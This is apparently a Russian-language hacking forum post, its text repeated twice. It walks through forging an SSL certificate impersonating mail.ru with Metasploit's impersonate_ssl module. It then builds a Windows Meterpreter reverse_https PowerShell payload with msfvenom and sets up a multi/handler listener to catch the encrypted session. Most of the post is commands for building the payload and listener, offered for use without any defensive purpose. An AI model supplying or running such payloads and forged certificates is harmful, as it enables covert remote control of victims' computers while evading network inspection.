Всем привет. Сегодня я покажу как можно с помощью подручных средств в кали линукс, создать защищенный канал между полезной нагрузкой и листенером.
На нашем форуме уже освещалась данная тематика, где Vander делал подробный обзор про замечательный инструмент Meterpreter Paranoid Mode.
Статья - Создание SSL сертификата. Meterpreter. MPM
Сегодня я покажу альтернативный способ, создания ssl соединения, только с помощью метасплойта. Мы рассмотрим:
auxiliary/gather/impersonate_ssl
Я буду генерировать сертификат mail.ru
Запускаем метасплойт пишем:
use auxiliary/gather/impersonate_ssl
set RHOST
run
По итогу как мы видим у нас создалось три файла.
Не плохой срок действия..)
Сейчас давайте создадим полезную нагрузку с нашим сгенерированным сертификатом.
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.108 LPORT=4444 PayloadUUIDTracking=true HandlerSSLCert=/root/
Далее создаём листенер который позволит нам принять данные с нашей полезной нагрузки для этого нам нужно добавить 2 две строчки, а именно:
set HandlerSSLCert /root/
set StagerVerifySSLCert true
полностью это будет выглядеть следующим образом.
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.0.108
set LPORT 4444
set HandlerSSLCert /root/
set StagerVerifySSLCert true
exploit -j
Так как у меня белый IP через роутер ,листенер на картинке будет немного отличаться.
По итогу получаем заветную сессию с проверкой сертификата SSL
На этом всё, спасибо за внимание.
На нашем форуме уже освещалась данная тематика, где Vander делал подробный обзор про замечательный инструмент Meterpreter Paranoid Mode.
Статья - Создание SSL сертификата. Meterpreter. MPM
Сегодня я покажу альтернативный способ, создания ssl соединения, только с помощью метасплойта. Мы рассмотрим:
- создания поддельного сертификата
- создадим полезную нагрузку PowerShell где будем использовать сертификат который сгенерировали ранее.
- Создания и настройка листенера для работы с нашей полезной нагрузкой.
auxiliary/gather/impersonate_ssl
Я буду генерировать сертификат mail.ru
Запускаем метасплойт пишем:
use auxiliary/gather/impersonate_ssl
set RHOST
Ссылка скрыта от гостей
run
По итогу как мы видим у нас создалось три файла.
Не плохой срок действия..)
Сейчас давайте создадим полезную нагрузку с нашим сгенерированным сертификатом.
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.108 LPORT=4444 PayloadUUIDTracking=true HandlerSSLCert=/root/
Ссылка скрыта от гостей
StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o 4444.batДалее создаём листенер который позволит нам принять данные с нашей полезной нагрузки для этого нам нужно добавить 2 две строчки, а именно:
set HandlerSSLCert /root/
Ссылка скрыта от гостей
(путь где файл сертификата)set StagerVerifySSLCert true
полностью это будет выглядеть следующим образом.
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.0.108
set LPORT 4444
set HandlerSSLCert /root/
Ссылка скрыта от гостей
set StagerVerifySSLCert true
exploit -j
Так как у меня белый IP через роутер ,листенер на картинке будет немного отличаться.
По итогу получаем заветную сессию с проверкой сертификата SSL
На этом всё, спасибо за внимание.
Последнее редактирование: